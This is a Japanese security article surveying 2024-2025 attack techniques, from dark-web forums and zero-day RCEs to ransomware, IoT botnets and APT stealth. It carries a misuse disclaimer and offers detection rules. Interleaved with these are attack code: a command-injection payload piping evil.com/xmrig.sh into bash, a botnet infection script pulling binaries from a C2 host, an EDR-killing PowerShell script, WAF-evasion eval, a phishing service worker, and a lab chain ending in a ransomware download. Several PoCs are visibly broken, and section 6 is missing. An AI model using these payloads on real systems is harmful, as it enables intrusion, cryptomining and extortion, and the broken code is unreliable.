News

【2025年版】激変するクラッキング最前線:AI&ゼロデイからIoTボットまで徹底解説!

2024年後半から2025年にかけ、攻撃手法はかつてない速度で進化しています。本記事では、ダークウェブやフォーラムで急増する新手法から、ゼロデイRCE、AI悪用、ステルス戦術まで、攻撃者のコード例とともに徹底解説。SVG図解付きで動画コンテンツ化にも最適です。

この記事の内容を悪用することは絶対にやめて下さい
他者の管理するネットワークなどに対して使用した場合、犯罪行為に当たる可能性があります


  1. 1. ダークウェブ&地下フォーラム動向
  2. 2. ゼロデイ&RCE悪用事例
  3. 3. ランサム&マルウェア最新トレンド
  4. 4. クラウド&インフラ攻撃
  5. 5. IoT/ICS ボットネット&DDoS
  6. 6. AI悪用&ディープフェイク詐欺
  7. 7. ソーシャルエンジニアリング新潮流
  8. 8. ステルス化するAPT技術
  9. 9. まとめ&防御策

目次

1. ダークウェブ&地下フォーラム動向

2024年後半から2025年にかけて、サイバー攻撃者コミュニティはダークウェブ上の地下フォーラムで活発に活動しています。ソラダール社の調査によれば、2024年には2,126人以上の脅威アクターが合計18,500件を超える投稿を行い、前年から約35%増加しました。投稿の多くは侵害済みアカウント情報、ネットワークへの不正アクセス権、マルウェアサンプル、ゼロデイExploitのPoC(概念実証コード)などで、これらはビットコインやモネロ等の暗号資産で取引されています。

情報 金融 製造 小売 投稿数↑
図1. 業種別地下フォーラム投稿数分布

1.1 主要フォーラムと利用フロー

代表的なダークウェブフォーラムには「Exploit」「XSS」「RaidForums」などがあります。利用手順は概ね以下のとおりです:

  1. Tor Browserをインストールし、.onionドメインへアクセス。
  2. アカウント作成:多くは招待制または少量の入会費を支払う必要あり。
  3. 投稿/閲覧:スレッド形式で情報交換。特に“初期アクセスブローカー(IAB)”が企業VPNやRDP権限を販売。
  4. 取引:投稿されたサンプルコードやアクセス権を暗号資産で購入。

1.2 マーケットプレイス比較

フォーラム名アクター数平均投稿数/月取引通貨
Exploit1,2001,800BTC, Monero
XSS6801,050BTC
RaidForums250600BTC

1.3 インテリジェンス収集ツール例

フォーラム監視には自動化スクリプトが有効です。以下はPython+SeleniumでTor経由にフォーラムをスクレイピングするサンプルです。

from selenium import webdriver

from selenium.webdriver.firefox.options import Options

import time
Torプロキシ設定
options = Options()

options.set_preference('network.proxy.type', 1)

options.set_preference('network.proxy.socks', '127.0.0.1')

options.set_preference('network.proxy.socks_port', 9050)

options.headless = True
driver = webdriver.Firefox(options=options)

driver.get('http://exploitforumbbb.onion/login.php')
ログイン
driver.find_element_by_name('username').send_keys('your_id')

driver.find_element_by_name('password').send_keys('your_pwd')

driver.find_element_by_name('login').click()

time.sleep(2)
トレンドスレッド取得
driver.get('http://exploitforumbbb.onion/latest.php')

threads = driver.find_elements_by_css_selector('.thread_title')

for t in threads[:10]:

    print(t.text)
driver.quit()

2. ゼロデイ&RCE悪用事例

2024年後半から2025年にかけて、未知またはパッチ未適用の「ゼロデイ脆弱性」を狙ったリモートコード実行(RCE)が相次ぎました。以下では代表的な事例を深掘りし、攻撃チェーンPoCコード検知ルール例まで詳しく解説します。

2.1 Cleo MFT 脆弱性(CVE-2024-50623)

Cleo Managed File Transfer は企業で広く使われるファイル転送ソフトですが、2024年12月にRCE脆弱性 CVE-2024-50623 がCl0pランサムウェアグループに悪用され、大量の機密データが窃取されました。

CVE-2024-50623 攻撃チェーン 1. 脆弱バージョン特定 2. 悪意payload送信 3. RCE & Webシェル設置
図2.1: CVE-2024-50623 攻撃チェーン概要

2.1.1 PoCコード例

<?php
// PoC: Cleo MFT RCE
$url    = 'https://victim.com/cleo/upload.php';
$payload = '';
$post    = ['file'=>curl_file_create(tmpfile(),'application/octet-stream','shell.php')];

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, ['upload'=>$payload]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

// 攻撃後は以下でシェル実行可
// https://victim.com/cleo/templates/shell.php?cmd=id
?>

2.1.2 フォレンジック痕跡 & 検知シグナル

シェル設置時の不審ファイル名や、以下のSigmaルールで検知可能です。

# Sigmaルール例: 不審なPHP uploadパターン
title: Possible PHP Web Shell Upload
id: 8c1f1a12-xxxx-xxxx-xxxx-1234567890ab
description: Detects attempts to upload PHP web shells via Cleo MFT.
logsource:
  product: webserver
  service: apache
detection:
  selection:
    Method: POST
    Url|contains: '/cleo/upload.php'
    RequestBody|contains|all:
      - '<?php system($_GET["cmd"])'
  condition: selection
level: high

2.2 Ivanti VPN 脆弱性(CVE-2024-21887)

Ivanti VPN製品の複数脆弱性は2024年初頭にRCEを許し、米国CISAシステムへの不正侵入に使われました。

2.2.1 脆弱性概要

  • CVE-2024-21887: 認証バイパス & 任意ファイル読み込み
  • CVSS 9.8: 攻撃者が未認証で管理コンソールの特定パラメータにアクセス可能

2.2.2 PoC概念コード

#!/bin/bash
# Exploit for CVE-2024-21887
TARGET="https://victim.com/vpn"
TOK=$(curl -sk "$TARGET/login" | grep -oP 'token"\s*value="\K[^"]+')
curl -sk -H "Authorization: Bearer $TOK" \
     -d "command=runUserScript&script=whoami" "$TARGET/api/run"
/* 出力に root 等が含まれればRCE成功 */

2.2.3 WAF回避テクニック

Base64エンコードでペイロードを隠蔽し、タグを分割する手法が多用されています。

// 回避例
$encoded = base64_encode('');
$payload = "eval(base64_decode('{$encoded}'));";
// POSTでpayloadを送信
?>

2.3 Palo Alto ファイアウォール脆弱性(CVE-2025-0108)

2025年1月、公表からわずか1日でGreynoiseが大量スキャンを検知した事例です。

2.3.1 攻撃手順デモ

# 認証不要エンドポイントへのアクセス試行
curl -sk "https://firewall.example.com/fti/path?command=ls"
/* Web管理インターフェイスが応答 => RCEの可能性 */

2.3.2 Sigmaルール例

title: Palo Alto Unauthenticated RCE Attempt
id: d5f2b3c4-xxxx-xxxx-xxxx-abcdef123456
logsource:
  product: firewall
detection:
  selection:
    Url|contains:
      - 'fti/path?command='
    StatusCode: 200
  condition: selection
level: critical

上記3つの事例は、ゼロデイ脆弱性が公開・パッチ前に如何に迅速に悪用されるかを示しています。攻撃チェーンの理解PoC解析、さらにはフォレンジック/SIEMルール制定が防御のカギとなります。

3. ランサムウェア&マルウェア最新トレンド

2024年後半から2025年にかけ、ランサムウェアとマルウェアの攻撃手法はさらに高度化・多様化しました。以下では、主要な攻撃グループのビジネスモデル、技術的トリック、検知/防御策まで詳しく解説します。

LockBit 45% RansomHub 30% その他 25%
図3: 主要ランサムウェアグループシェア

3.1 RaaSビジネスモデルの進化

「Ransomware as a Service (RaaS)」モデルでは、開発者がマルウェア本体を提供し、アフィリエイトが攻撃を実行。2024年後半に急成長したRansomHubは、身代金の90%をアフィリエイトに還元する高インセンティブを提示し、わずか半年でグループシェアを30%まで拡大しました。

3.1.1 RaaS収益モデル比較表

グループ名アフィリエイト還元率初期費用サポート体制
LockBit70%$10,000専用フォーラム
RansomHub90%$5,000チャットサポート
BlackCat80%$8,000ドキュメント完備

3.2 EDR回避ツールの内部解説

RansomHubが開発した EDRKillShifter は、既知の脆弱ドライバをロードしてカーネルレベルでEDRのフックを解除します。以下は主要機能のフロー図解です。

EDRKillShifter 動作フロー ステップ1: 脆弱ドライバ選択 ステップ2: ドライバロード ステップ3: フック解除
図3.2: EDRKillShifter のステップ

3.2.1 サンプルPowerShellスクリプト

# ドライバロード & EDR回避
$driver = "C:\Windows\System32\drivers\vuln.sys"
Start-Process -FilePath "pnputil.exe" -ArgumentList "/add-driver $driver /install" -Wait
# EDRプロセスを列挙して終了
Get-Process | Where-Object { $_.ProcessName -match 'EDR' } | Stop-Process -Force

3.3 被害復旧手順とインシデント対応

ランサム被害を受けた際の標準的な復旧フローを以下にまとめます。

  1. 隔離:感染ホストをネットワークから切り離す。
  2. 調査:感染タイムラインと暗号化範囲を特定。
  3. 復号鍵取得:ランサム支払い or 法執行機関からの鍵提供。
  4. 復旧:バックアップからのリストア。
  5. 対策:脆弱性パッチ適用、EDRシグネチャ更新。

3.3.1 インシデント対応Playbookサンプル

# Ransomware Incident Response Playbook
- name: Ransomware Isolation
  actions:
    - disconnect_host_from_network
    - disable_remote_access
- name: Evidence Collection
  actions:
    - collect_event_logs
    - capture_memory_dump
- name: Decryption
  actions:
    - contact_legal
    - negotiate_decryption_key
- name: Recovery
  actions:
    - restore_from_backup
    - validate_data_integrity
- name: Post-Mortem
  actions:
    - perform_root_cause_analysis
    - update_security_controls

4. クラウド&インフラ攻撃

クラウドサービスやネットワークインフラを狙った攻撃は、2024年後半から2025年にかけて急増しています。ここでは代表的な脆弱性とその悪用手法を解説し、検知・防御のための具体的なツールと設定例を紹介します。

クラウド攻撃ターゲット比率 AWS 50% Azure 30% GCP 20%
図4: クラウドプロバイダ別攻撃比率

4.1 Aviatrix Controller RCE(CVE-2024-50603)

Aviatrix Controllerの致命的RCE脆弱性(CVSS 10.0)は2024年11月に公表され、即座に暗号資産マイニングやバックドア設置に悪用されました。

4.1.1 攻撃フロー図解

Aviatrix RCE 攻撃フロー 脆弱性スキャン Payload送信 RCE & マイニング
図4.1: Aviatrix RCE 攻撃フロー

4.1.2 PoC示唆コード

#!/bin/bash
# Aviatrix RCE PoC
TARGET="https://aviatrix.example.com/v1/api"
TOKEN="Bearer YOUR_API_TOKEN"
PAYLOAD="; curl http://evil.com/xmrig.sh | bash; #"
curl -sk -H "Authorization: $TOKEN" \
     -d "action=run_command&command=$PAYLOAD" \
     "$TARGET"

4.1.3 Defender for Cloud 検知設定例

name: Aviatrix RCE Malware Detection
event_sources:
  - Microsoft.WebServerFirewallLogs
conditions:
  all:
    - field: RequestUri
      contains: 'run_command'
    - field: HttpMethod
      equals: 'POST'
    - field: RequestBody
      contains: 'xmrig.sh'
actions:
  - alert: true
  - block_ip: true

4.2 AWS S3 誤設定による機密データ漏洩

公開設定ミスのS3バケットから大量の個人情報や機密ファイルが流出し、2025年初頭も継続的に報告されています。

4.2.1 典型的な誤設定例

{
  "Version":"2012-10-17",
  "Statement":[
    {
      "Sid":"PublicRead",
      "Effect":"Allow",
      "Principal":"*",
      "Action":"s3:GetObject",
      "Resource":"arn:aws:s3:::my-bucket/*"
    }
  ]
}

上記ポリシーでバケット内の全ファイルが世界中に公開されます。

4.2.2 AWS Config ルールで監視する

ConfigRule:
  Type: "AWS::Config::ConfigRule"
  Properties:
    ConfigRuleName: "s3-bucket-public-read-prohibited"
    Scope:
      ComplianceResourceTypes:
        - "AWS::S3::Bucket"
    Source:
      Owner: "AWS"
      SourceIdentifier: "S3_BUCKET_PUBLIC_READ_PROHIBITED"

4.3 ネットワークインフラ脆弱性

Palo Alto, Fortinet, CiscoなどのVPN/ファイアウォール脆弱性は公表から即スキャンが入り、放置するとWebシェル設置やMITM中継に悪用されます。

4.3.1 Zeekスクリプト例

# detect suspicious GET with cmd parameter
event http_request(c: connection, method: string, original_URI: string, unescaped_URI: string, version: string) {
  if ( unescaped_URI =~ /cmd=/ ) {
    NOTICE([$note=Notice::WebShell, $msg="Possible RCE attempt", $conn=c]);
  }
}

4.3.2 ネットワーク分離アーキテクチャ図

推奨ネットワーク分離設計 インターネット DMZ (WAF/NAT) 内部ネットワーク

上記設計でDMZにWAF/NATを配置し、重要リソースへの直接アクセスを遮断します。


5. IoT/ICSボットネット&DDoS

2024年後半から2025年にかけ、IoTデバイスや産業制御システム(ICS)を悪用した大規模DDoSやボットネット攻撃が確認されています。本章では代表的なマルウェア亜種の動作、感染スクリプト、ICSプロトコル攻撃例、検知ルール、そして防御のベストプラクティスまで詳説します。

IoTボットネット感染台数推移 Jan Mar May Jul Sep Nov 台数↑
図5: IoTボットネット感染台数推移 (千台)

5.1 Mirai系マルウェア亜種 ― “Murdoc” ボットネット

「Murdoc」は、Mirai/Bashlite系の脆弱IoTデバイスを狙い、多様な攻撃機能を搭載した亜種です。2024年7月から活動を始め、約1,300台のIoT機器に感染しました。

5.1.1 感染スクリプト詳細


#!/bin/sh
# Murdoc Infection Script
IP="attacker.command-and-control"
PORT=6667
# デバイス種別判定
ARCH=$(uname -m)
if [ "$ARCH" = "armv7l" ]; then
    BIN="murdoc_arm"
else
    BIN="murdoc_x86"
fi
# ダウンロード & 実行
wget http://$IP:$PORT/$BIN -O /tmp/$BIN
chmod +x /tmp/$BIN
/tmp/$BIN -d
# C&C接続
/tmp/$BIN --connect $IP:$PORT

上記実行後、バックグラウンドでC&Cサーバから命令を受け取り、大規模DDoSやプロキシ機能として動作します。

5.1.2 DDoS攻撃パラメータ例

{
  "attack": "HTTP_FLOOD",
  "target": "victim.com",
  "rate": 5000,        // qps
  "duration": 300      // seconds
}

5.1.3 Snortルール例 (HTTP Flood 検知)

alert tcp any any -> $HOME_NET 80 (msg:"HTTP Flood DDoS"; flow:to_server,established; content:"GET"; threshold:type both, track by_src, count 100, seconds 1; sid:1000005; rev:1;)

5.2 ICSプロトコル攻撃 ― Modbus/TCP & BACnet

産業制御システムでは Modbus/TCP や BACnet が狙われ、特に未認証ポート開放が攻撃を助長しました。以下はModbus/TCPへの簡易スキャン/コマンド例です。

5.2.1 Modbusスキャン & Read Coil コマンド

from pymodbus.client.sync import ModbusTcpClient

client = ModbusTcpClient('192.168.1.100', port=502)
client.connect()
# Coilを読む (0番位置、10個)
result = client.read_coils(address=0, count=10, unit=1)
print(result.bits)
client.close()

攻撃者はこれによりPLCの制御ビットを直接読み取り、プロセスを妨害することが可能です。

5.2.2 Zeekシグネチャ例

# detect Modbus unauthorized access
event connection_state_remove(c: connection) {
  if ( c$service == "modbus" && c$id$orig_h != 0.0.0.0/0 ) {
    NOTICE([$note=Notice::Suspicious, $msg="Modbus access from non-whitelisted host", $conn=c]);
  }
}

5.3 防御&ネットワークセグメンテーション

IoT/ICS向けには、下記のベストプラクティスが推奨されます:

  • ネットワーク分離:OTネットワークはITネットワークと物理的に分離
  • ホワイトリスト通信:許可済みIP/ポートのみ通信可とするファイアウォール設定
  • デバイス監視エージェント:弱小デバイスにも軽量エージェントを展開し、異常通信を検知
  • 定期パッチ適用:脆弱性管理とファームウェア更新の自動化

5.3.1 OTセグメンテーション例 (SVG)

IoT/ICS ネットワークセグメンテーション ITネットワーク DMZ OTネットワーク
図5.3: OTネットワークセグメンテーション例

7. ソーシャルエンジニアリング新潮流

AIやマルウェアに頼らない「人の心を突く」攻撃手法も進化しています。2024年後半から2025年にかけて報告された代表的な多層ソーシャルエンジニアリング攻撃を詳解します。

マルチチャネル攻撃フロー (Phish→Malware→Call) 1. フィッシングメール 2. マルウェア感染 3. なりすまし電話
図7: マルチチャネルソーシャルエンジニアリング攻撃フロー

7.1 PWAフィッシングの巧妙化

Progressive Web App(PWA)を悪用し、偽モバイルアプリをホーム画面に追加させる攻撃が増加。2024年には銀行系の偽ログインPWAが多数出回りました。

7.1.1 実装例(manifest.json)

{
  "name": "SecureBank",
  "short_name": "SB",
  "start_url": "/login.html",
  "display": "standalone",
  "icons": [
    {
      "src": "/icons/bank.png",
      "sizes": "192x192",
      "type": "image/png"
    }
  ]
}

7.1.2 Service Worker スクリプト

// sw.js
self.addEventListener('fetch', event => {
  // 正規APIは中継せず
  if (event.request.url.includes('/api/login')) {
    event.respondWith(
      fetch('/fake_login_response.json')
    );
  }
  else {
    event.respondWith(fetch(event.request));
  }
});

7.2 マルチチャネル詐欺ケーススタディ

某社では、メールでマルウェアを感染させた後、取得した社内連絡先に電話をかけ、上司になりすまして金銭送金を指示する攻撃が発生。以下は電話スクリプトの例です。


(攻撃者)
「お疲れ様です、管理部の佐藤です。〇〇さんの支払いシステムが障害で動作しておらず、
急ぎ御社の口座に振り込みができません。今すぐそちらのXYZ銀行口座番号を教えていただけますか?」

このように、ITと電話を組み合わせたコンビネーション攻撃が脅威です。


7.3 フィッシング練習環境の構築スクリプト

社内教育用途に、Owasp Go Phishを用いた練習環境のDocker Compose例を紹介します。

version: '3'
services:
  gophish:
    image: gophish/gophish:latest
    ports:
      - "3333:3333"
      - "8080:80"
    volumes:
      - ./gophish_data:/data

8. ステルス化するAPT技術

高度な持続的脅威(APT)グループは、検知を回避しつつ長期間潜伏する「ステルス戦術」を駆使します。ここでは代表的なTTP(戦術・技術・手順)を詳述し、攻撃者が用いるLiving‐off‐the‐Land(LoTL)や多段プロキシの実装例、SIEMでの検知ルールをご紹介します。

APTステルス戦術マトリクス LoTL活用 カスタムマルウェア 単一プロキシ 多段プロキシ PowerShell Custom RAT SSH Tunnel Tor/Discord
図8: APTステルス戦術マトリクス

8.1 LoTL 実装例:PowerShell & WMI

攻撃者は外部バイナリを持ち込まず、Windows標準機能のみで攻撃コードを実行します。以下はWMI経由でPowerShellを実行する例です。

# LoTL: WMI経由でコマンド実行
$command = 'powershell -NoP -NonI -W Hidden -EncodedCommand ' +
           [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $command

8.1.1 検知ポイント

  • Event ID 4688: 見慣れないプロセス作成コマンドラインを監視
  • WMIログ: Root\CIMV2\SecurityログにInvoke-WmiMethod呼び出しが残る
# Sigma: WMI経由PowerShell実行検知
title: WMI-based PowerShell Execution
logsource:
  product: windows
detection:
  selection:
    EventID: 4688
    CommandLine|contains:
      - 'EncodedCommand'
      - 'Invoke-WmiMethod'
  condition: selection
level: high

8.2 多段プロキシ構築:Tor + SSHチェーン

追跡阻止のため、複数の中継ノードを経由してC2サーバと通信します。以下はTorとSSHを組み合わせた例です。

#!/bin/bash
# 多段プロキシチェーン起動例
# 1) Tor起動
tor &

# 2) SSHトンネル(踏み台1)
ssh -N -D 9051 user@bastion1.example.com &

# 3) もう1段(踏み台2)
ssh -N -D 9052 user@bastion2.example.com &

# 4) Proxychains設定 (/etc/proxychains.conf)
# [ProxyList]
# socks5  127.0.0.1 9050
# socks5  127.0.0.1 9051
# socks5  127.0.0.1 9052

# 5) 攻撃ツール起動
proxychains4 ./custom_rat

8.3 SIEMでの総合検知ルール例

上記LoTLとプロキシチェーンを併せて検知するSIEMルール例です。

- name: Detect Stealthy C2 via WMI and Proxychains
  condition:
    and:
      - evt.event_id == 4688
      - evt.CommandLine contains "Invoke-WmiMethod"
      - net.conn_summaries.dst_port in [9050,9051,9052]
      - proc.name == "custom_rat"
  actions:
    - alert: true
    - tag: stealth_apt

9. 総合演習:最新攻撃フルチェーンのPoC

ここまで解説してきた各種攻撃手法をひとつに繋げ、**Webアプリ脆弱性→初期アクセス→横展開→権限昇格→データ窃取→ランサムウェア展開**までの一連のフルチェーンをローカル環境で再現する手順を示します。学習用の検証環境を構築し、実際に攻撃者視点で動作確認しながら、各フェーズの検知・防御策も併せて学びましょう。

9.1 環境準備

  • VirtualBox または Docker で以下のコンテナを起動:
    • 脆弱Webアプリ(Cleo MFT擬似版)
    • Windows Server 2019(WMI/LoTL実験用)
    • PostgreSQL サーバ(データベース窃取用)
    • Kali Linux(攻撃マシン)
  • ネットワークは同一セグメントで通信可能に設定

9.2 フェーズ1:Webアプリ脆弱性のスキャン & RCE

# Kali上でNiktoを走らせて脆弱ポイントを発見
nikto -h http://10.0.2.15:8080

# CVE-2024-50623をターゲットにPoCを実行
bash poc_cleo.sh http://10.0.2.15:8080/cleo/upload.php

成功すると Web シェルが /cleo/templates/shell.php に配置されます。

9.3 フェーズ2:横展開 & 権限昇格

// shell.php経由でシステム情報取得
curl "http://10.0.2.15/cleo/templates/shell.php?cmd=whoami"

// WMI 経由で別Windowsホストにコード展開
curl "http://10.0.2.15/cleo/templates/shell.php?cmd=powershell -EncodedCommand ..."

ここでLoTL手法により、ペイロードレスでWMI経由の管理コードを実行します。

9.4 フェーズ3:データベース窃取

-- Shell経由でpsqlに接続し、PostgreSQLから機密テーブルをダンプ
PGPASSWORD='password' psql -h 10.0.2.20 -U dbuser -d sampledb -c "COPY secrets TO STDOUT WITH CSV" > leak.csv

機密データが leak.csv に保存されます。

9.5 フェーズ4:ランサムウェア展開

# Windowsサーバ上でRansomHub亜種をダウンロード・実行
Invoke-WebRequest -Uri "http://10.0.2.1/mallet.exe" -OutFile "$env:TEMP\mallet.exe"
Start-Process "$env:TEMP\mallet.exe" -ArgumentList "/encrypt C:\SensitiveData"

エンコードされたファイルが C:\SensitiveData に生成され、身代金要求画面が表示されます。

9.6 各フェーズの検知 & 防御対策まとめ

フェーズ検知手法防御策
WebアプリRCESigmaルール (upload.php→shell)File upload制限 & WAF
LoTL/WMIEventID4688 & Proxychains検知WMIログ監視 & MMI制御
DB窃取異常psql接続ログネットワークACL & データ漏洩防止
ランサムウェアEDRKillShifter検知ルールシステムイメージバックアップ & EDR設定

10. 付録:ツール&リソース集

本記事で取り上げた攻撃手法・検知ルールを実践する際に便利なツールやリソースをまとめました。GitHubリンクやインストール手順も併記していますので、即座に学習環境や検知環境を構築できます。

10.1 攻撃・PoCツール一覧

10.2 検知・防御ツール集

  • SigmaSigmaHQ/sigma – 汎用的なSIEMルールフォーマット。
  • Zeekzeek/zeek – ネットワーク解析フレームワーク。
  • Snortsnort3/snort3 – IDS/IPSエンジン。
  • Wazuhwazuh/wazuh – ホスト型EDR/SIEMソリューション。
  • Falcofalcosecurity/falco – クラウドネイティブランタイムセキュリティ。
  • OSQueryosquery/osquery – エンドポイント監視用SQLインターフェイス。

10.3 インシデント対応テンプレート

インシデント発生時に役立つプレイブックのテンプレートです。状況に応じてカスタマイズしてください。

incident_response_playbook:
  - phase: Preparation
    tasks:
      - update_incident_contacts
      - test_backup_restore
  - phase: Identification
    tasks:
      - detect_anomalous_logs
      - collect_endpoint_data
  - phase: Containment
    tasks:
      - isolate_affected_systems
      - block_c2_domains
  - phase: Eradication
    tasks:
      - remove_malicious_artifacts
      - patch_vulnerabilities
  - phase: Recovery
    tasks:
      - restore_services
      - validate_system_integrity
  - phase: Lessons Learned
    tasks:
      - conduct_postmortem
      - update_policies_and_procedures

10.4 参考文献・リンク集


本記事を活用し、実際のセキュリティ演習やSIEM導入時のリファレンスとしてご利用ください。この記事でご紹介したコードやルールはあくまで学習用のサンプルですので、自環境に合わせたチューニングを行ってください。